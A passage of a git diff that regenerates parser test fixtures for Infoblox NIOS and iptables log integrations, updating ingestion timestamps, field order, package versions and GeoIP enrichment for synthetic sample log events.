"1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 10 12:23:41 cinge7339.api.corp -:diskcheck vitaedi", "event": { - "ingested": "2021-06-09T11:22:12.539679300Z" + "ingested": "2021-12-14T14:46:58.554819007Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 24 19:26:15 dolore7072.www5.localhost ect: logger modocons", "event": { - "ingested": "2021-06-09T11:22:12.539684100Z" + "ingested": "2021-12-14T14:46:58.554819719Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 11 02:28:49 odoconse228.mail.localdomain -:syslog-ng veli", "event": { - "ingested": "2021-06-09T11:22:12.539688900Z" + "ingested": "2021-12-14T14:46:58.554820437Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 25 09:31:24 labo267.internal.localhost httpd[etdo]: 2018-3-25 9:31:24.par [lorin]: Login_Denied - - to=pitl ip=10.204.128.215 info=ama", "event": { - "ingested": "2021-06-09T11:22:12.539693700Z" + "ingested": "2021-12-14T14:46:58.554821047Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Apr 8 16:33:58 roidents6540.internal.corp -:debug tametcon", "event": { - "ingested": "2021-06-09T11:22:12.539698300Z" + "ingested": "2021-12-14T14:46:58.554821729Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 22 23:36:32 miurerep1152.internal.domain pidof[utlab]: can't read sid from emUteni", "event": { - "ingested": "2021-06-09T11:22:12.539702600Z" + "ingested": "2021-12-14T14:46:58.554822364Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 07 06:39:06 inimve2352.lan :captured_dns_uploader mco", "event": { - "ingested": "2021-06-09T11:22:12.539707200Z" + "ingested": "2021-12-14T14:46:58.554823008Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 21 13:41:41 amcorp1275.www5.host netauto_core[liqua]: netautoctl:olo", "event": { - "ingested": "2021-06-09T11:22:12.539711900Z" + "ingested": "2021-12-14T14:46:58.554823711Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jun 04 20:44:15 fdeF593.internal.lan DIS[niamq]: lapariat: remagn: Attempting discover-now for 10.238.140.186 on tiaec, using session ID", "event": { - "ingested": "2021-06-09T11:22:12.539716700Z" + "ingested": "2021-12-14T14:46:58.554824659Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 19 03:46:49 upt4986.mail.corp ntpdate[idunt]: luptat", "event": { - "ingested": "2021-06-09T11:22:12.539721400Z" + "ingested": "2021-12-14T14:46:58.554825364Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 3 10:49:23 lillum7809.mail.local taedicta: logger ritt", "event": { - "ingested": "2021-06-09T11:22:12.539726100Z" + "ingested": "2021-12-14T14:46:58.554826060Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 17 17:51:58 tetur2694.mail.local ipi: openvpn-member OpenVPN 1.7727 [ipv6-icmp] [uaeab] itinv", "event": { - "ingested": "2021-06-09T11:22:12.539730600Z" + "ingested": "2021-12-14T14:46:58.554826785Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 1 00:54:32 utaliqu6138.mail.localhost nvolupt: pidof can't read sid from oremi", "event": { - "ingested": "2021-06-09T11:22:12.539735200Z" + "ingested": "2021-12-14T14:46:58.554827592Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 15 07:57:06 atcupi2332.mail.localdomain -:INFOBLOX-Grid Upgrade to ore", "event": { - "ingested": "2021-06-09T11:22:12.539739700Z" + "ingested": "2021-12-14T14:46:58.554828404Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 29 14:59:40 luptatem6874.mail.test purge_scheduled_tasks[dat]: Scheduled tasks have been purged", "event": { - "ingested": "2021-06-09T11:22:12.539744500Z" + "ingested": "2021-12-14T14:46:58.554829225Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 12 22:02:15 tame4953.mail.localhost prehen: restarting ntutlabo", "event": { - "ingested": "2021-06-09T11:22:12.539749700Z" + "ingested": "2021-12-14T14:46:58.554829953Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 27 05:04:49 sequa1715.www5.domain sshd[eirure]: Accepted password for root from 10.210.113.252 port 4184 udp", "event": { - "ingested": "2021-06-09T11:22:12.539754700Z" + "ingested": "2021-12-14T14:46:58.554830764Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 11 12:07:23 tconsec5315.internal.example :kernel Linux version 1.341 (fugi) (labo) nostrud", "event": { - "ingested": "2021-06-09T11:22:12.539759600Z" + "ingested": "2021-12-14T14:46:58.554831520Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 25 19:09:57 cupi1867.www5.test :rcsysinit orroq", "event": { - "ingested": "2021-06-09T11:22:12.539764600Z" + "ingested": "2021-12-14T14:46:58.554832361Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 9 02:12:32 rcit2043.api.home 10.107.45.175 smart_check_io: ssecil", "event": { - "ingested": "2021-06-09T11:22:12.539769400Z" + "ingested": "2021-12-14T14:46:58.554833108Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 23 09:15:06 mes4801.internal.test 10.243.121.97 python: cancel: FQDN='illu4875.api.host', View='tatevel'", "event": { - "ingested": "2021-06-09T11:22:12.539774100Z" + "ingested": "2021-12-14T14:46:58.554833848Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 7 16:17:40 its7867.internal.invalid 10.44.115.94 debug_mount: mount isn", "event": { - "ingested": "2021-06-09T11:22:12.539778900Z" + "ingested": "2021-12-14T14:46:58.554834605Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Dec 21 23:20:14 equ4808.www.localhost DIS[siuta]: urmagn:dquia: Devicetemporin/10.46.166.75login failuresuccess", "event": { - "ingested": "2021-06-09T11:22:12.539784100Z" + "ingested": "2021-12-14T14:46:58.554835636Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 05 06:22:49 idi7668.www5.test rum: captured_dns_uploader eataevi", "event": { - "ingested": "2021-06-09T11:22:12.539789300Z" + "ingested": "2021-12-14T14:46:58.554836234Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 19 13:25:23 iqu4614.www5.example 10.60.211.199 init: modocon", "event": { - "ingested": "2021-06-09T11:22:12.539794100Z" + "ingested": "2021-12-14T14:46:58.554836915Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 2 20:27:57 agnaaliq1829.mail.test :ntpd_initres ntpd exiting on signal 15", "event": { - "ingested": "2021-06-09T11:22:12.539798500Z" + "ingested": "2021-12-14T14:46:58.554837571Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 17 03:30:32 col3570.www.invalid tinvolup: sSMTP Sent mail for tsed (inv) uid=rroq username=rcit outbytes=2807", "event": { - "ingested": "2021-06-09T11:22:12.539803600Z" + "ingested": "2021-12-14T14:46:58.554838282Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 3 10:33:06 mipsamvo4282.api.home reetdo: init oreveri", "event": { - "ingested": "2021-06-09T11:22:12.539808300Z" + "ingested": "2021-12-14T14:46:58.554839174Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 17 17:35:40 Except6889.www.corp -:rc3 umetMal", "event": { - "ingested": "2021-06-09T11:22:12.539813100Z" + "ingested": "2021-12-14T14:46:58.554839835Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Apr 1 00:38:14 umq1309.api.test uae: debug mve", "event": { - "ingested": "2021-06-09T11:22:12.539817900Z" + "ingested": "2021-12-14T14:46:58.554840588Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 15 07:40:49 tatem4180.www.home 10.102.166.19 python: deny: FQDN='eritatis6343.api.local', View='mquisn'", "event": { - "ingested": "2021-06-09T11:22:12.539822700Z" + "ingested": "2021-12-14T14:46:58.554841308Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 29 14:43:23 quir7168.api.localdomain labore: syslog uela", "event": { - "ingested": "2021-06-09T11:22:12.539827500Z" + "ingested": "2021-12-14T14:46:58.554842060Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 13 21:45:57 iuntNequ7202.api.domain -:controld Distribution Complete", "event": { - "ingested": "2021-06-09T11:22:12.539832400Z" + "ingested": "2021-12-14T14:46:58.554842829Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 28 04:48:31 veniamq1236.invalid emo: radiusd itq", "event": { - "ingested": "2021-06-09T11:22:12.539838300Z" + "ingested": "2021-12-14T14:46:58.554843702Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 11 11:51:06 nderiti409.api.domain -:syslog Cic", "event": { - "ingested": "2021-06-09T11:22:12.539843200Z" + "ingested": "2021-12-14T14:46:58.554844348Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 25 18:53:40 tatem6156.www.local :dhcpd received shutdown -/-/ success", "event": { - "ingested": "2021-06-09T11:22:12.539852100Z" + "ingested": "2021-12-14T14:46:58.554845094Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 10 01:56:14 uamnihil6127.api.domain 10.29.119.245 python: accept: 'olli3116.internal.example' in view 'rsp'.", "event": { - "ingested": "2021-06-09T11:22:12.539857100Z" + "ingested": "2021-12-14T14:46:58.554845837Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jul 24 08:58:48 roquisqu1205.api.domain netauto_core[nim]: utaliqu: Attempting CLI on devicersiwith interface not in table, ip10.118.155.14", "event": { - "ingested": "2021-06-09T11:22:12.539862200Z" + "ingested": "2021-12-14T14:46:58.554846574Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 7 16:01:23 suntex5169.www.example phonehome[esci]: uov", "event": { - "ingested": "2021-06-09T11:22:12.539867200Z" + "ingested": "2021-12-14T14:46:58.554847286Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 21 23:03:57 fici5161.www5.example olup: debug_mount mount aco", "event": { - "ingested": "2021-06-09T11:22:12.539871900Z" + "ingested": "2021-12-14T14:46:58.554848049Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 5 06:06:31 orsi7617.www5.corp lorsita: shutdown shutting down for system reboot", "event": { - "ingested": "2021-06-09T11:22:12.539876500Z" + "ingested": "2021-12-14T14:46:58.554849212Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 19 13:09:05 osamnis4912.mail.host npr: radiusd etconsec", "event": { - "ingested": "2021-06-09T11:22:12.539881Z" + "ingested": "2021-12-14T14:46:58.554849959Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Oct 03 20:11:40 urExcept6809.www5.corp captured_dns_uploader[atcupida]: tessequa", "event": { - "ingested": "2021-06-09T11:22:12.539885700Z" + "ingested": "2021-12-14T14:46:58.554850800Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Oct 18 03:14:14 icab3519.localdomain dhcpdv6[plicaboN]: Encapsulated Renew message from 2001:db8::b1f51444:f88dd359 port 2496 from client DUID acommo, transaction ID isi", "event": { - "ingested": "2021-06-09T11:22:12.539890100Z" + "ingested": "2021-12-14T14:46:58.554851612Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 1 10:16:48 abor4353.www5.host ame: python tesseq", "event": { - "ingested": "2021-06-09T11:22:12.539894600Z" + "ingested": "2021-12-14T14:46:58.554852404Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 15 17:19:22 olorem290.api.lan sshd[culpaqui]: deny: logout() unknown", "event": { - "ingested": "2021-06-09T11:22:12.539899200Z" + "ingested": "2021-12-14T14:46:58.554853191Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 30 00:21:57 ventore3612.www.home purge_scheduled_tasks[emp]: Scheduled tasks have been purged", "event": { - "ingested": "2021-06-09T11:22:12.539903900Z" + "ingested": "2021-12-14T14:46:58.554853965Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Dec 14 07:24:31 uptatem4483.localhost tacacs_acct[inrepr]: mol: Server 10.111.52.69 port 6073: asperna", "event": { - "ingested": "2021-06-09T11:22:12.539908800Z" + "ingested": "2021-12-14T14:46:58.554855114Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/infoblox/manifest.yml b/packages/infoblox/manifest.yml index ae9bb5dee85..2dd3d8b19c8 100644 --- a/packages/infoblox/manifest.yml +++ b/packages/infoblox/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: infoblox title: Infoblox NIOS Logs -version: 0.6.0 +version: 0.6.1 description: Collect NIOS logs from Infoblox devices with Elastic Agent. categories: ["network"] release: experimental diff --git a/packages/iptables/changelog.yml b/packages/iptables/changelog.yml index e6532da1ae0..d04234cefe6 100644 --- a/packages/iptables/changelog.yml +++ b/packages/iptables/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.6.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.6.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/iptables/data_stream/log/_dev/test/pipeline/test-iptables-raw.log-expected.json b/packages/iptables/data_stream/log/_dev/test/pipeline/test-iptables-raw.log-expected.json index 0e53091d6e7..e1a57c17452 100644 --- a/packages/iptables/data_stream/log/_dev/test/pipeline/test-iptables-raw.log-expected.json +++ b/packages/iptables/data_stream/log/_dev/test/pipeline/test-iptables-raw.log-expected.json @@ -42,6 +42,18 @@ "id": "default" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 38842, "mac": "90:10:65:29:b6:2a", "ip": "67.43.156.15" @@ -76,7 +88,7 @@ }, "event": { "action": "drop", - "ingested": "2021-12-09T13:39:42.195706800Z", + "ingested": "2021-12-14T14:47:01.888409439Z", "original": "\u003c161\u003eOct 10 07:25:12 Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", "type": [ "denied", @@ -130,6 +142,18 @@ "id": "default" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 38842, "mac": "90:10:65:29:b6:2a", "ip": "67.43.156.15" @@ -164,7 +188,7 @@ }, "event": { "action": "drop", - "ingested": "2021-12-09T13:39:42.195716800Z", + "ingested": "2021-12-14T14:47:01.888412753Z", "original": "\u003c6\u003e2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", "type": [ "denied", @@ -213,6 +237,18 @@ "id": "default" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 38842, "mac": "90:10:65:29:b6:2a", "ip": "67.43.156.15" @@ -247,7 +283,7 @@ }, "event": { "action": "drop", - "ingested": "2021-12-09T13:39:42.195726300Z", + "ingested": "2021-12-14T14:47:01.888413240Z", "original": "2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", "type": [ "denied", @@ -274,23 +310,6 @@ }, "ttl": 118 }, - "destination": { - "mac": "90:10:28:5f:62:24", - "ip": "192.168.2.83" - }, - "source": { - "mac": "90:10:18:5a:89:2a", - "ip": "192.168.2.71" - }, - "message": "DENY: IN=eth0 OUT= MAC=90:10:28:5f:62:24:90:10:18:5a:89:2a:08:00 SRC=192.168.2.71 DST=192.168.2.83 LEN=88 TOS=0x00 PREC=0x00 TTL=118 ID=21684 PROTO=ICMP TYPE=3 CODE=3 [SRC=192.168.2.83 DST=192.168.173.191 LEN=60 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=UDP SPT=21458 DPT=62936 LEN=40 ]", - "tags": [ - "preserve_original_event" - ], - "network": { - "type": "ipv4", - "community_id": "1:v5jWdgB//QU/ZfG9vivofYLpWjA=", - "transport": "icmp" - }, "@timestamp": "2021-01-08T03:37:09.000Z", "ecs": { "version": "1.12.0" @@ -301,9 +320,18 @@ "192.168.2.83" ] }, + "destination": { + "mac": "90:10:28:5f:62:24", + "ip": "192.168.2.83" + }, + "source": { + "mac": "90:10:18:5a:89:2a", + "ip": "192.168.2.71" + }, + "message": "DENY: IN=eth0 OUT= MAC=90:10:28:5f:62:24:90:10:18:5a:89:2a:08:00 SRC=192.168.2.71 DST=192.168.2.83 LEN=88 TOS=0x00 PREC=0x00 TTL=118 ID=21684 PROTO=ICMP TYPE=3 CODE=3 [SRC=192.168.2.83 DST=192.168.173.191 LEN=60 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=UDP SPT=21458 DPT=62936 LEN=40 ]", "event": { "action": "deny", - "ingested": "2021-12-09T13:39:42.195732600Z", + "ingested": "2021-12-14T14:47:01.888413690Z", "original": "Jan 8 03:37:09 DENY: IN=eth0 OUT= MAC=90:10:28:5f:62:24:90:10:18:5a:89:2a:08:00 SRC=192.168.2.71 DST=192.168.2.83 LEN=88 TOS=0x00 PREC=0x00 TTL=118 ID=21684 PROTO=ICMP TYPE=3 CODE=3 [SRC=192.168.2.83 DST=192.168.173.191 LEN=60 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=UDP SPT=21458 DPT=62936 LEN=40 ]", "type": [ "denied", @@ -313,6 +341,14 @@ "network" ], "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "type": "ipv4", + "community_id": "1:v5jWdgB//QU/ZfG9vivofYLpWjA=", + "transport": "icmp" } }, { @@ -344,20 +380,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "port": 17805, @@ -388,7 +418,7 @@ }, "event": { "action": "drop_input", - "ingested": "2021-12-09T13:39:42.195737Z", + "ingested": "2021-12-14T14:47:01.888414088Z", "original": "Jan 8 03:37:09 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=15743 DF PROTO=TCP SPT=17805 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "type": [ "denied", @@ -452,7 +482,7 @@ }, "event": { "action": "drop_input", - "ingested": "2021-12-09T13:39:42.195742Z", + "ingested": "2021-12-14T14:47:01.888414560Z", "original": "Jan 8 03:37:57 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.198 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=243 ID=17703 PROTO=TCP SPT=47091 DPT=1433 WINDOW=1024 RES=0x00 SYN URGP=0 ", "type": [ "denied", @@ -493,20 +523,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "port": 59319, @@ -537,7 +561,7 @@ }, "event": { "action": "drop_input", - "ingested": "2021-12-09T13:39:42.195748100Z", + "ingested": "2021-12-14T14:47:01.888415074Z", "original": "Jan 8 03:38:45 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=19619 DF PROTO=TCP SPT=59319 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "type": [ "denied", @@ -578,20 +602,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "port": 44181, @@ -622,7 +640,7 @@ }, "event": { "action": "drop_input", - "ingested": "2021-12-09T13:39:42.195753500Z", + "ingested": "2021-12-14T14:47:01.888415458Z", "original": "Jan 8 03:39:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=240 ID=4255 DF PROTO=TCP SPT=44181 DPT=80 WINDOW=14600 RES=0x00 SYN URGP=0 ", "type": [ "denied", @@ -663,20 +681,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "port": 64358, @@ -707,7 +719,7 @@ }, "event": { "action": "drop_input", - "ingested": "2021-12-09T13:39:42.195757900Z", + "ingested": "2021-12-14T14:47:01.888415840Z", "original": "Jan 8 03:40:21 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=110 ID=27150 DF PROTO=TCP SPT=64358 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "type": [ "denied", @@ -771,7 +783,7 @@ }, "event": { "action": "drop_input", - "ingested": "2021-12-09T13:39:42.195762900Z", + "ingested": "2021-12-14T14:47:01.888416213Z", "original": "Jan 8 03:40:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=192.168.100.160 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=242 ID=7264 PROTO=TCP SPT=58830 DPT=445 WINDOW=1024 RES=0x00 SYN URGP=0 ", "type": [ "denied", @@ -838,7 +850,7 @@ }, "event": { "action": "drop_input", - "ingested": "2021-12-09T13:39:42.195767800Z", + "ingested": "2021-12-14T14:47:01.888416591Z", "original": "Jan 8 03:41:17 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.115 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=117 ID=6101 DF PROTO=TCP SPT=51985 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "type": [ "denied", @@ -905,7 +917,7 @@ }, "event": { "action": "drop_input", - "ingested": "2021-12-09T13:39:42.195772100Z", + "ingested": "2021-12-14T14:47:01.888417161Z", "original": "Jan 8 03:41:23 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.167 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=45 ID=6319 DF PROTO=TCP SPT=4099 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "type": [ "denied", @@ -969,7 +981,7 @@ }, "event": { "action": "drop_input", - "ingested": "2021-12-09T13:39:42.195776600Z", + "ingested": "2021-12-14T14:47:01.888417535Z", "original": "Jan 8 03:43:18 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=192.168.100.19 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=245 ID=48624 PROTO=TCP SPT=59287 DPT=139 WINDOW=1024 RES=0x00 SYN URGP=0 ", "type": [ "denied", @@ -1033,7 +1045,7 @@ }, "event": { "action": "drop_input", - "ingested": "2021-12-09T13:39:42.195781600Z", + "ingested": "2021-12-14T14:47:01.888417920Z", "original": "Jan 8 03:43:42 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00:45:00:00:00:00 SRC=192.168.100.68 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=250 ID=54321 PROTO=TCP SPT=53296 DPT=8088 